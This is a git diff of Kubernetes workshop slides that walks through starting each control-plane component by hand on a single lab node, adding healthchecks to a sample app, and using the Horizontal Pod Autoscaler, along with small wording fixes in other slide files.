+  etcd -version
+  kube-apiserver --version
+  dockerd --version
+  ```
+
+]
+
+---
+
+## The plan
+
+1. Start API server
+
+2. Interact with it (create Deployment and Service)
+
+3. See what's broken
+
+4. Fix it and go back to step 2 until it works!
+
+---
+
+## Dealing with multiple processes
+
+- We are going to start many processes
+
+- Depending on what you're comfortable with, you can:
+
+  - open multiple windows and multiple SSH connections
+
+  - use a terminal multiplexer like screen or tmux
+
+  - put processes in the background with `&`
+    <br/>(warning: log output might get confusing to read!)
+
+---
+
+## Starting API server
+
+.exercise[
+
+- Try to start the API server:
+  ```bash
+  kube-apiserver
+  # It will fail with "--etcd-servers must be specified"
+  ```
+
+]
+
+Since the API server stores everything in etcd,
+it cannot start without it.
+
+---
+
+## Starting etcd
+
+.exercise[
+
+- Try to start etcd:
+  ```bash
+  etcd
+  ```
+
+]
+
+Success!
+
+Note the last line of output:
+```
+serving insecure client requests on 127.0.0.1:2379, this is strongly discouraged!
+```
+
+*Sure, that's discouraged. But thanks for telling us the address!*
+
+---
+
+## Starting API server (for real)
+
+- Try again, passing the `--etcd-servers` argument
+
+- That argument should be a comma-separated list of URLs
+
+.exercise[
+
+- Start API server:
+  ```bash
+  kube-apiserver --etcd-servers http://127.0.0.1:2379
+  ```
+
+]
+
+Success!
+
+---
+
+## Interacting with API server
+
+- Let's try a few "classic" commands
+
+.exercise[
+
+- List nodes:
+  ```bash
+  kubectl get nodes
+  ```
+
+- List services:
+  ```bash
+  kubectl get services
+  ```
+
+]
+
+We should get `No resources found.` and the `kubernetes` service, respectively.
+
+Note: the API server automatically created the `kubernetes` service entry.
+
+---
+
+class: extra-details
+
+## What about `kubeconfig`?
+
+- We didn't need to create a `kubeconfig` file
+
+- By default, the API server is listening on `localhost:8080`
+
+  (without requiring authentication)
+
+- By default, `kubectl` connects to `localhost:8080`
+
+  (without providing authentication)
+
+---
+
+## Creating a Deployment
+
+- Let's run a web server!
+
+.exercise[
+
+- Create a Deployment with NGINX:
+  ```bash
+  kubectl create deployment web --image=nginx
+  ```
+
+]
+
+Success?
+
+---
+
+## Checking our Deployment status
+
+.exercise[
+
+- Look at pods, deployments, etc.:
+  ```bash
+  kubectl get all
+  ```
+
+]
+
+Our Deployment is in bad shape:
+```
+NAME                  READY   UP-TO-DATE   AVAILABLE   AGE
+deployment.apps/web   0/1     0            0           2m26s
+```
+
+And, there is no ReplicaSet, and no Pod.
+
+---
+
+## What's going on?
+
+- We stored the definition of our Deployment in etcd
+
+  (through the API server)
+
+- But there is no *controller* to do the rest of the work
+
+- We need to start the *controller manager*
+
+---
+
+## Starting the controller manager
+
+.exercise[
+
+- Try to start the controller manager:
+  ```bash
+  kube-controller-manager
+  ```
+
+]
+
+The final error message is:
+```
+invalid configuration: no configuration has been provided
+```
+
+But the logs include another useful piece of information:
+```
+Neither --kubeconfig nor --master was specified.
+Using the inClusterConfig.  This might not work.
+```
+
+---
+
+## Reminder: everyone talks to API server
+
+- The controller manager needs to connect to the API server
+
+- It *does not* have a convenient `localhost:8080` default
+
+- We can pass the connection information in two ways:
+
+  - `--master` and a host:port combination (easy)
+
+  - `--kubeconfig` and a `kubeconfig` file
+
+- For simplicity, we'll use the first option
+
+---
+
+## Starting the controller manager (for real)
+
+.exercise[
+
+- Start the controller manager:
+  ```bash
+  kube-controller-manager --master http://localhost:8080
+  ```
+
+]
+
+Success!
+
+---
+
+## Checking our Deployment status
+
+.exercise[
+
+- Check all our resources again:
+  ```bash
+  kubectl get all
+  ```
+
+]
+
+We now have a ReplicaSet.
+
+But we still don't have a Pod.
+
+---
+
+## What's going on?
+
+In the controller manager logs, we should see something like this:
+```
+E0404 15:46:25.753376   22847 replica_set.go:450] Sync "default/web-5bc9bd5b8d"
+failed with `No API token found for service account "default"`, retry after the
+token is automatically created and added to the service account
+```
+
+- The service account `default` was automatically added to our Deployment
+
+  (and to its pods)
+
+- The service account `default` exists
+
+- But it doesn't have an associated token
+
+  (the token is a secret; creating it requires signature; therefore a CA)
+
+---
+
+## Solving the missing token issue
+
+There are many ways to solve that issue.
+
+We are going to list a few (to get an idea of what's happening behind the scenes).
+
+Of course, we don't need to perform *all* the solutions mentioned here.
+
+---
+
+## Option 1: disable service accounts
+
+- Restart the API server with
+  `--disable-admission-plugins=ServiceAccount`
+
+- The API server will no longer add a service account automatically
+
+- Our pods will be created without a service account
+
+---
+
+## Option 2: do not mount the (missing) token
+
+- Add `automountServiceAccountToken: false` to the Deployment spec
+
+  *or*
+
+- Add `automountServiceAccountToken: false` to the default ServiceAccount
+
+- The ReplicaSet controller will no longer create pods referencing the (missing) token
+
+.exercise[
+
+- Programmatically change the `default` ServiceAccount:
+  ```bash
+  kubectl patch sa default -p "automountServiceAccountToken: false"
+  ```
+
+]
+
+---
+
+## Option 3: set up service accounts properly
+
+- This is the most complex option!
+
+- Generate a key pair
+
+- Pass the private key to the controller manager
+
+  (to generate and sign tokens)
+
+- Pass the public key to the API server
+
+  (to verify these tokens)
+
+---
+
+## Continuing without service account token
+
+- Once we patch the default service account, the ReplicaSet can create a Pod
+
+.exercise[
+
+- Check that we now have a pod:
+  ```bash
+  kubectl get all
+  ```
+
+]
+
+Note: we might have to wait a bit for the ReplicaSet controller to retry.
+
+If we're impatient, we can restart the controller manager.
+
+---
+
+## What's next?
+
+- Our pod exists, but it is in `Pending` state
+
+- Remember, we don't have a node so far
+
+  (`kubectl get nodes` shows an empty list)
+
+- We need to:
+
+  - start a container engine
+
+  - start kubelet
+
+---
+
+## Starting a container engine
+
+- We're going to use Docker (because it's the default option)
+
+.exercise[
+
+- Start the Docker Engine:
+  ```bash
+  dockerd
+  ```
+
+]
+
+Success!
+
+Feel free to check that it actually works with e.g.:
+```bash
+docker run alpine echo hello world
+```
+
+---
+
+## Starting kubelet
+
+- If we start kubelet without arguments, it *will* start
+
+- But it will not join the cluster!
+
+- It will start in *standalone* mode
+
+- Just like with the controller manager, we need to tell kubelet where the API server is
+
+- Alas, kubelet doesn't have a simple `--master` option
+
+- We have to use `--kubeconfig`
+
+- We need to write a `kubeconfig` file for kubelet
+
+---
+
+## Writing a kubeconfig file
+
+- We can copy/paste a bunch of YAML
+
+- Or we can generate the file with `kubectl`
+
+.exercise[
+
+- Create the file `kubeconfig.kubelet` with `kubectl`:
+  ```bash
+    kubectl --kubeconfig kubeconfig.kubelet config \
+            set-cluster localhost --server http://localhost:8080
+    kubectl --kubeconfig kubeconfig.kubelet config \
+            set-context localhost --cluster localhost
+    kubectl --kubeconfig kubeconfig.kubelet config \
+            use-context localhost
+  ```
+
+]
+
+---
+
+## All Kubernetes clients can use `kubeconfig`
+
+- The `kubeconfig.kubelet` file has the same format as e.g. `~/.kubeconfig`
+
+- All Kubernetes clients can use a similar file
+
+- The `kubectl config` commands can be used to manipulate these files
+
+- This highlights that kubelet is a "normal" client of the API server
+
+---
+
+## Our `kubeconfig.kubelet` file
+
+The file that we generated looks like the one below.
+
+That one has been slightly simplified (removing extraneous fields), but it is still valid.
+
+```yaml
+apiVersion: v1
+kind: Config
+current-context: localhost
+contexts:
+- name: localhost
+  context:
+    cluster: localhost
+clusters:
+- name: localhost
+  cluster:
+    server: http://localhost:8080
+```
+
+---
+
+## Starting kubelet
+
+.exercise[
+
+- Start kubelet with that `kubeconfig.kubelet` file:
+  ```bash
+  kubelet --kubeconfig kubeconfig.kubelet
+  ```
+
+]
+
+Success!
+
+---
+
+## Looking at our 1-node cluster
+
+- Let's check that our node registered correctly
+
+.exercise[
+
+- List the nodes in our cluster:
+  ```bash
+  kubectl get nodes
+  ```
+
+]
+
+Our node should show up.
+
+Its name will be its hostname (it should be `dmuc1`).
+
+---
+
+## Are we there yet?
+
+- Let's check if our pod is running
+
+.exercise[
+
+- List all resources:
+  ```bash
+  kubectl get all
+  ```
+
+]
+
+--
+
+Our pod is still `Pending`. 🤔
+
+--
+
+Which is normal: it needs to be *scheduled*.
+
+(i.e., something needs to decide which node it should go on.)
+
+---
+
+## Scheduling our pod
+
+- Why do we need a scheduling decision, since we have only one node?
+
+- The node might be full, unavailable; the pod might have constraints ...
+
+- The easiest way to schedule our pod is to start the scheduler
+
+  (we could also schedule it manually)
+
+---
+
+## Starting the scheduler
+
+- The scheduler also needs to know how to connect to the API server
+
+- Just like for controller manager, we can use `--kubeconfig` or `--master`
+
+.exercise[
+
+- Start the scheduler:
+  ```bash
+  kube-scheduler --master http://localhost:8080
+  ```
+
+]
+
+- Our pod should now start correctly
+
+---
+
+## Checking the status of our pod
+
+- Our pod will go through a short `ContainerCreating` phase
+
+- Then it will be `Running`
+
+.exercise[
+
+- Check pod status:
+  ```bash
+  kubectl get pods
+  ```
+
+]
+
+Success!
+
+---
+
+class: extra-details
+
+## Scheduling a pod manually
+
+- We can schedule a pod in `Pending` state by creating a Binding, e.g.:
+  ```bash
+    kubectl create -f- <<EOF
+    apiVersion: v1
+    kind: Binding
+    metadata:
+      name: name-of-the-pod
+    target:
+      apiVersion: v1
+      kind: Node
+      name: name-of-the-node
+    EOF
+  ```
+
+- This is actually how the scheduler works!
+
+- It watches pods, makes scheduling decisions, and creates Binding objects
+
+---
+
+## Connecting to our pod
+
+- Let's check that our pod correctly runs NGINX
+
+.exercise[
+
+- Check our pod's IP address:
+  ```bash
+  kubectl get pods -o wide
+  ```
+
+- Send some HTTP request to the pod:
+  ```bash
+  curl `X.X.X.X`
+  ```
+
+]
+
+We should see the `Welcome to nginx!` page.
+
+---
+
+## Exposing our Deployment
+
+- We can now create a Service associated with this Deployment
+
+.exercise[
+
+- Expose the Deployment's port 80:
+  ```bash
+  kubectl expose deployment web --port=80
+  ```
+
+- Check the Service's ClusterIP, and try connecting:
+  ```bash
+  kubectl get service web
+  curl http://`X.X.X.X`
+  ```
+
+]
+
+--
+
+This won't work. We need kube-proxy to enable internal communication.
+
+---
+
+## Starting kube-proxy
+
+- kube-proxy also needs to connect to the API server
+
+- It can work with the `--master` flag
+
+  (although that will be deprecated in the future)
+
+.exercise[
+
+- Start kube-proxy:
+  ```bash
+  kube-proxy --master http://localhost:8080
+  ```
+
+]
+
+---
+
+## Connecting to our Service
+
+- Now that kube-proxy is running, we should be able to connect
+
+.exercise[
+
+- Check the Service's ClusterIP again, and retry connecting:
+  ```bash
+  kubectl get service web
+  curl http://`X.X.X.X`
+  ```
+
+]
+
+Success!
+
+---
+
+class: extra-details
+
+## How kube-proxy works
+
+- kube-proxy watches Service resources
+
+- When a Service is created or updated, kube-proxy creates iptables rules
+
+.exercise[
+
+- Check out the `OUTPUT` chain in the `nat` table:
+  ```bash
+  iptables -t nat -L OUTPUT
+  ```
+
+- Traffic is sent to `KUBE-SERVICES`; check that too:
+  ```bash
+  iptables -t nat -L KUBE-SERVICES
+  ```
+
+]
+
+For each Service, there is an entry in that chain.
+
+---
+
+class: extra-details
+
+## Diving into iptables
+
+- The last command showed a chain named `KUBE-SVC-...` corresponding to our service
+
+.exercise[
+
+- Check that `KUBE-SVC-...` chain:
+  ```bash
+  iptables -t nat -L `KUBE-SVC-...`
+  ```
+
+- It should show a jump to a `KUBE-SEP-...` chains; check it out too:
+  ```bash
+  iptables -t nat -L `KUBE-SEP-...`
+  ```
+
+]
+
+This is a `DNAT` rule to rewrite the destination address of the connection to our pod.
+
+This is how kube-proxy works!
+
+---
+
+class: extra-details
+
+## kube-router, IPVS
+
+- With recent versions of Kubernetes, it is possible to tell kube-proxy to use IPVS
+
+- IPVS is a more powerful load balancing framework
+
+  (remember: iptables was primarily designed for firewalling, not load balancing!)
+
+- It is also possible to replace kube-proxy with kube-router
+
+- kube-router uses IPVS by default
+
+- kube-router can also perform other functions
+
+  (e.g., we can use it as a CNI plugin to provide pod connectivity)
+
+---
+
+class: extra-details
+
+## What about the `kubernetes` service?
+
+- If we try to connect, it won't work
+
+  (by default, it should be `10.0.0.1`)
+
+- If we look at the Endpoints for this service, we will see one endpoint:
+
+  `host-address:6443`
+
+- By default, the API server expects to be running directly on the nodes
+
+  (it could be as a bare process, or in a container/pod using the host network)
+
+- ... And it expects to be listening on port 6443 with TLS
--- a/slides/k8s/extending-api.md
+++ b/slides/k8s/extending-api.md
@@ -61,7 +61,7 @@ There are many possibilities!

  - creates a new custom type, `Remote`, exposing a git+ssh server

-  - deploy by pushing YAML or Helm Charts to that remote
+  - deploy by pushing YAML or Helm charts to that remote

 - Replacing built-in types with CRDs

@@ -87,7 +87,11 @@ There are many possibilities!

  (and take action when they are created/updated)

-*Example: [YAML to install the gitkube CRD](https://storage.googleapis.com/gitkube/gitkube-setup-stable.yaml)*
+*
+Examples:
+[YAML to install the gitkube CRD](https://storage.googleapis.com/gitkube/gitkube-setup-stable.yaml),
+[YAML to install a redis operator CRD](https://github.com/amaizfinance/redis-operator/blob/master/deploy/crds/k8s_v1alpha1_redis_crd.yaml)
+*

 ---

@@ -113,7 +117,7 @@ There are many possibilities!

 ## Admission controllers

- When a Pod is created, it is associated to a ServiceAccount
+- When a Pod is created, it is associated with a ServiceAccount

  (even if we did not specify one explicitly)

@@ -159,7 +163,7 @@ class: pic

 - These webhooks can be *validating* or *mutating*

- Webhooks can be setup dynamically (without restarting the API server)
+- Webhooks can be set up dynamically (without restarting the API server)

 - To setup a dynamic admission webhook, we create a special resource:

@@ -167,7 +171,7 @@ class: pic

 - These resources are created and managed like other resources

-  (i.e. `kubectl create`, `kubectl get` ...)
+  (i.e. `kubectl create`, `kubectl get`...)

 ---

--- a/slides/k8s/gitworkflows.md
+++ b/slides/k8s/gitworkflows.md
@@ -234,6 +234,6 @@

  (see the [documentation](https://github.com/hasura/gitkube/blob/master/docs/remote.md) for more details)

- Gitkube can also deploy Helm Charts
+- Gitkube can also deploy Helm charts

  (instead of raw YAML files)
--- a/slides/k8s/healthchecks-more.md
+++ b/slides/k8s/healthchecks-more.md
@@ -0,0 +1,393 @@
+## Questions to ask before adding healthchecks
+
+- Do we want liveness, readiness, both?
+
+  (sometimes, we can use the same check, but with different failure thresholds)
+
+- Do we have existing HTTP endpoints that we can use?
+
+- Do we need to add new endpoints, or perhaps use something else?
+
+- Are our healthchecks likely to use resources and/or slow down the app?
+
+- Do they depend on additional services?
+
+  (this can be particularly tricky, see next slide)
+
+---
+
+## Healthchecks and dependencies
+
+- A good healthcheck should always indicate the health of the service itself
+
+- It should not be affected by the state of the service's dependencies
+
+- Example: a web server requiring a database connection to operate
+
+  (make sure that the healthcheck can report "OK" even if the database is down;
+  <br/>
+  because it won't help us to restart the web server if the issue is with the DB!)
+
+- Example: a microservice calling other microservices
+
+- Example: a worker process
+
+  (these will generally require minor code changes to report health)
+
+---
+
+## Adding healthchecks to an app
+
+- Let's add healthchecks to DockerCoins!
+
+- We will examine the questions of the previous slide
+
+- Then we will review each component individually to add healthchecks
+
+---
+
+## Liveness, readiness, or both?
+
+- To answer that question, we need to see the app run for a while
+
+- Do we get temporary, recoverable glitches?
+
+  → then use readiness
+
+- Or do we get hard lock-ups requiring a restart?
+
+  → then use liveness
+
+- In the case of DockerCoins, we don't know yet!
+
+- Let's pick liveness
+
+---
+
+## Do we have HTTP endpoints that we can use?
+
+- Each of the 3 web services (hasher, rng, webui) has a trivial route on `/`
+
+- These routes:
+
+  - don't seem to perform anything complex or expensive
+
+  - don't seem to call other services
+
+- Perfect!
+
+  (See next slides for individual details)
+
+---
+
+- [hasher.rb](https://github.com/jpetazzo/container.training/blob/master/dockercoins/hasher/hasher.rb)
+  ```ruby
+    get '/' do
+      "HASHER running on #{Socket.gethostname}\n"
+    end
+  ```
+
+- [rng.py](https://github.com/jpetazzo/container.training/blob/master/dockercoins/rng/rng.py)
+  ```python
+    @app.route("/")
+    def index():
+      return "RNG running on {}\n".format(hostname)
+  ```
+
+- [webui.js](https://github.com/jpetazzo/container.training/blob/master/dockercoins/webui/webui.js)
+  ```javascript
+    app.get('/', function (req, res) {
+      res.redirect('/index.html');
+    });
+  ```
+
+---
+
+## Running DockerCoins
+
+- We will run DockerCoins in a new, separate namespace
+
+- We will use a set of YAML manifests and pre-built images
+
+- We will add our new liveness probe to the YAML of the `rng` DaemonSet
+
+- Then, we will deploy the application
+
+---
+
+## Creating a new namespace
+
+- This will make sure that we don't collide / conflict with previous exercises
+
+.exercise[
+
+- Create the yellow namespace:
+  ```bash
+  kubectl create namespace yellow
+  ```
+
+- Switch to that namespace:
+  ```bash
+  kns yellow
+  ```
+
+]
+
+---
+
+## Retrieving DockerCoins manifests
+
+- All the manifests that we need are on a convenient repository:
+
+  https://github.com/jpetazzo/kubercoins
+
+.exercise[
+
+- Clone that repository:
+  ```bash
+  cd ~
+  git clone https://github.com/jpetazzo/kubercoins
+  ```
+
+- Change directory to the repository:
+  ```bash
+  cd kubercoins
+  ```
+
+]
+
+---
+
+## A simple HTTP liveness probe
+
+This is what our liveness probe should look like:
+
+```yaml
+containers:
+- name: ...
+image: ...
+livenessProbe:
+  httpGet:
+    path: /
+    port: 80
+  initialDelaySeconds: 30
+  periodSeconds: 5
+```
+
+This will give 30 seconds to the service to start. (Way more than necessary!)
+<br/>
+It will run the probe every 5 seconds.
+<br/>
+It will use the default timeout (1 second).
+<br/>
+It will use the default failure threshold (3 failed attempts = dead).
+<br/>
+It will use the default success threshold (1 successful attempt = alive).
+
+---
+
+## Adding the liveness probe
+
+- Let's add the liveness probe, then deploy DockerCoins
+
+.exercise[
+
+- Edit `rng-daemonset.yaml` and add the liveness probe
+  ```bash
+  vim rng-daemonset.yaml
+  ```
+
+- Load the YAML for all the resources of DockerCoins:
+  ```bash
+  kubectl apply -f .
+  ```
+
+]
+
+---
+
+## Testing the liveness probe
+
+- The rng service needs 100ms to process a request
+
+  (because it is single-threaded and sleeps 0.1s in each request)
+
+- The probe timeout is set to 1 second
+
+- If we send more than 10 requests per second per backend, it will break
+
+- Let's generate traffic and see what happens!
+
+.exercise[
+
+- Get the ClusterIP address of the rng service:
+  ```bash
+  kubectl get svc rng
+  ```
+
+]
+
+---
+
+## Monitoring the rng service
+
+- Each command below will show us what's happening on a different level
+
+.exercise[
+
+- In one window, monitor cluster events:
+  ```bash
+  kubectl get events -w
+  ```
+
+- In another window, monitor the response time of rng:
+  ```bash
+  httping `<ClusterIP>`
+  ```
+
+- In another window, monitor pods status:
+  ```bash
+  kubectl get pods -w
+  ```
+
+]
+
+---
+
+## Generating traffic
+
+- Let's use `ab` to send concurrent requests to rng
+
+.exercise[
+
+- In yet another window, generate traffic:
+  ```bash
+  ab -c 10 -n 1000 http://`<ClusterIP>`/1
+  ```
+
+- Experiment with higher values of `-c` and see what happens
+
+]
+
+- The `-c` parameter indicates the number of concurrent requests
+
+- The final `/1` is important to generate actual traffic
+
+  (otherwise we would use the ping endpoint, which doesn't sleep 0.1s per request)
+
+---
+
+## Discussion
+
+- Above a given threshold, the liveness probe starts failing
+
+  (about 10 concurrent requests per backend should be plenty enough)
+
+- When the liveness probe fails 3 times in a row, the container is restarted
+
+- During the restart, there is *less* capacity available
+
+- ... Meaning that the other backends are likely to timeout as well
+
+- ... Eventually causing all backends to be restarted
+
+- ... And each fresh backend gets restarted, too
+
+- This goes on until the load goes down, or we add capacity
+
+*This wouldn't be a good healthcheck in a real application!*
+
+---
+
+## Better healthchecks
+
+- We need to make sure that the healthcheck doesn't trip when
+  performance degrades due to external pressure
+
+- Using a readiness check would have fewer effects
+
+  (but it would still be an imperfect solution)
+
+- A possible combination:
+
+  - readiness check with a short timeout / low failure threshold
+
+  - liveness check with a longer timeout / higher failure threshold
+
+---
+
+## Healthchecks for redis
+
+- A liveness probe is enough
+
+  (it's not useful to remove a backend from rotation when it's the only one)
+
+- We could use an exec probe running `redis-cli ping`
+
+---
+
+class: extra-details
+
+## Exec probes and zombies
+
+- When using exec probes, we should make sure that we have a *zombie reaper*
+
+  🤔🧐🧟 Wait, what?
+
+- When a process terminates, its parent must call `wait()`/`waitpid()`
+
+  (this is how the parent process retrieves the child's exit status)
+
+- In the meantime, the process is in *zombie* state
+
+  (the process state will show as `Z` in `ps`, `top` ...)
+
+- When a process is killed, its children are *orphaned* and attached to PID 1
+
+- PID 1 has the responsibility of *reaping* these processes when they terminate
+
+- OK, but how does that affect us?
+
+---
+
+class: extra-details
+
+## PID 1 in containers
+
+- On ordinary systems, PID 1 (`/sbin/init`) has logic to reap processes
+
+- In containers, PID 1 is typically our application process
+
+  (e.g. Apache, the JVM, NGINX, Redis ...)
+
+- These *do not* take care of reaping orphans
+
+- If we use exec probes, we need to add a process reaper
+
+- We can add [tini](https://github.com/krallin/tini) to our images
+
+- Or [share the PID namespace between containers of a pod](https://kubernetes.io/docs/tasks/configure-pod-container/share-process-namespace/)
+
+  (and have gcr.io/pause take care of the reaping)
+
+---
+
+## Healthchecks for worker
+
+- Readiness isn't useful
+
+  (because worker isn't a backend for a service)
+
+- Liveness may help us restart a broken worker, but how can we check it?
+
+- Embedding an HTTP server is an option
+
+  (but it has a high potential for unwanted side effects and false positives)
+
+- Using a "lease" file can be relatively easy:
+
+  - touch a file during each iteration of the main loop
+
+  - check the timestamp of that file from an exec probe
+
+- Writing logs (and checking them from the probe) also works
--- a/slides/k8s/healthchecks.md
+++ b/slides/k8s/healthchecks.md
@@ -108,7 +108,7 @@

  (as opposed to merely started)

- Containers in a broken state gets killed and restarted
+- Containers in a broken state get killed and restarted

  (instead of serving errors or timeouts)

--- a/slides/k8s/helm.md
+++ b/slides/k8s/helm.md
@@ -158,7 +158,7 @@ Where do these `--set` options come from?

 ]

-The chart's metadata includes an URL to the project's home page.
+The chart's metadata includes a URL to the project's home page.

 (Sometimes it conveniently points to the documentation for the chart.)

@@ -176,77 +176,3 @@ The chart's metadata includes an URL to the project's home page.
  ```

 ]
-
---
-
-## Creating a chart
-
- We are going to show a way to create a *very simplified* chart
-
- In a real chart, *lots of things* would be templatized
-
-  (Resource names, service types, number of replicas...)
-
-.exercise[
-
- Create a sample chart:
-  ```bash
-  helm create dockercoins
-  ```
-
- Move away the sample templates and create an empty template directory:
-  ```bash
-  mv dockercoins/templates dockercoins/default-templates
-  mkdir dockercoins/templates
-  ```
-
-]
-
---
-
-## Exporting the YAML for our application
-
- The following section assumes that DockerCoins is currently running
-
-.exercise[
-
- Create one YAML file for each resource that we need:
-  .small[
-  ```bash
-
-	while read kind name; do
-	  kubectl get -o yaml --export $kind $name > dockercoins/templates/$name-$kind.yaml
-	done <<EOF
-	deployment worker
-	deployment hasher
-	daemonset rng
-	deployment webui
-	deployment redis
-	service hasher
-	service rng
-	service webui
-	service redis
-	EOF
-  ```
-  ]
-
-]
-
---
-
-## Testing our helm chart
-
-.exercise[
-
- Let's install our helm chart! (`dockercoins` is the path to the chart)
-  ```
-  helm install dockercoins
-  ```
-]
-
--
-
- Since the application is already deployed, this will fail:<br>
-`Error: release loitering-otter failed: services "hasher" already exists`
-
- To avoid naming conflicts, we will deploy the application in another *namespace*
--- a/slides/k8s/horizontal-pod-autoscaler.md
+++ b/slides/k8s/horizontal-pod-autoscaler.md
@@ -0,0 +1,245 @@
+# The Horizontal Pod Autoscaler
+
+- What is the Horizontal Pod Autoscaler, or HPA?
+
+- It is a controller that can perform *horizontal* scaling automatically
+
+- Horizontal scaling = changing the number of replicas
+
+  (adding/removing pods)
+
+- Vertical scaling = changing the size of individual replicas
+
+  (increasing/reducing CPU and RAM per pod)
+
+- Cluster scaling = changing the size of the cluster
+
+  (adding/removing nodes)
+
+---
+
+## Principle of operation
+
+- Each HPA resource (or "policy") specifies:
+
+  - which object to monitor and scale (e.g. a Deployment, ReplicaSet...)
+
+  - min/max scaling ranges (the max is a safety limit!)
+
+  - a target resource usage (e.g. the default is CPU=80%)
+
+- The HPA continuously monitors the CPU usage for the related object
+
+- It computes how many pods should be running:
+
+  `TargetNumOfPods = ceil(sum(CurrentPodsCPUUtilization) / Target)`
+
+- It scales the related object up/down to this target number of pods
+
+---
+
+## Pre-requirements
+
+- The metrics server needs to be running
+
+  (i.e. we need to be able to see pod metrics with `kubectl top pods`)
+
+- The pods that we want to autoscale need to have resource requests
+
+  (because the target CPU% is not absolute, but relative to the request)
+
+- The latter actually makes a lot of sense:
+
+  - if a Pod doesn't have a CPU request, it might be using 10% of CPU...
+
+  - ...but only because there is no CPU time available!
+
+  - this makes sure that we won't add pods to nodes that are already resource-starved
+
+---
+
+## Testing the HPA
+
+- We will start a CPU-intensive web service
+
+- We will send some traffic to that service
+
+- We will create an HPA policy
+
+- The HPA will automatically scale up the service for us
+
+---
+
+## A CPU-intensive web service
+
+- Let's use `jpetazzo/busyhttp`
+
+  (it is a web server that will use 1s of CPU for each HTTP request)
+
+.exercise[
+
+- Deploy the web server:
+  ```bash
+  kubectl create deployment busyhttp --image=jpetazzo/busyhttp
+  ```
+
+- Expose it with a ClusterIP service:
+  ```bash
+  kubectl expose deployment busyhttp --port=80
+  ```
+
+- Get the ClusterIP allocated to the service:
+  ```bash
+  kubectl get svc busyhttp
+  ```
+
+]
+
+---
+
+## Monitor what's going on
+
+- Let's start a bunch of commands to watch what is happening
+
+.exercise[
+
+- Monitor pod CPU usage:
+  ```bash
+  watch kubectl top pods
+  ```
+
+- Monitor service latency:
+  ```bash
+  httping http://`ClusterIP`/
+  ```
+
+- Monitor cluster events:
+  ```bash
+  kubectl get events -w
+  ```
+
+]
+
+---
+
+## Send traffic to the service
+
+- We will use `ab` (Apache Bench) to send traffic
+
+.exercise[
+
+- Send a lot of requests to the service, with a concurrency level of 3:
+  ```bash
+  ab -c 3 -n 100000 http://`ClusterIP`/
+  ```
+
+]
+
+The latency (reported by `httping`) should increase above 3s.
+
+The CPU utilization should increase to 100%.
+
+(The server is single-threaded and won't go above 100%.)
+
+---
+
+## Create an HPA policy
+
+- There is a helper command to do that for us: `kubectl autoscale`
+
+.exercise[
+
+- Create the HPA policy for the `busyhttp` deployment:
+  ```bash
+  kubectl autoscale deployment busyhttp --max=10
+  ```
+
+]
+
+By default, it will assume a target of 80% CPU usage.
+
+This can also be set with `--cpu-percent=`.
+
+--
+
+*The autoscaler doesn't seem to work. Why?*
+
+---
+
+## What did we miss?
+
+- The events stream gives us a hint, but to be honest, it's not very clear:
+
+  `missing request for cpu`
+
+- We forgot to specify a resource request for our Deployment!
+
+- The HPA target is not an absolute CPU%
+
+- It is relative to the CPU requested by the pod
+
+---
+
+## Adding a CPU request
+
+- Let's edit the deployment and add a CPU request
+
+- Since our server can use up to 1 core, let's request 1 core
+
+.exercise[
+
+- Edit the Deployment definition:
+  ```bash
+  kubectl edit deployment busyhttp
+  ```
+
+- In the `containers` list, add the following block:
+  ```yaml
+    resources:
+      requests:
+        cpu: "1"
+  ```
+
+]
+
+---
+
+## Results
+
+- After saving and quitting, a rolling update happens
+
+  (if `ab` or `httping` exits, make sure to restart it)
+
+- It will take a minute or two for the HPA to kick in:
+
+  - the HPA runs every 30 seconds by default
+
+  - it needs to gather metrics from the metrics server first
+
+- If we scale further up (or down), the HPA will react after a few minutes:
+
+  - it won't scale up if it already scaled in the last 3 minutes
+
+  - it won't scale down if it already scaled in the last 5 minutes
+
+---
+
+## What about other metrics?
+
+- The HPA in API group `autoscaling/v1` only supports CPU scaling
+
+- The HPA in API group `autoscaling/v2beta2` supports metrics from various API groups:
+
+  - metrics.k8s.io, aka metrics server (per-Pod CPU and RAM)
+
+  - custom.metrics.k8s.io, custom metrics per Pod
+
+  - external.metrics.k8s.io, external metrics (not associated to Pods)
+
+- Kubernetes doesn't implement any of these API groups
+
+- Using these metrics requires [registering additional APIs](https://kubernetes.io/docs/tasks/run-application/horizontal-pod-autoscale/#support-for-metrics-apis)
+
+- The metrics provided by metrics server are standard; everything else is custom
+
+- For more details, see [this great blog post](https://medium.com/uptime-99/kubernetes-hpa-autoscaling-with-custom-and-external-metrics-da7f41ff7846) or [this talk](https://www.youtube.com/watch?v=gSiGFH4ZnS8)
--- a/Show More
+++ b/Show More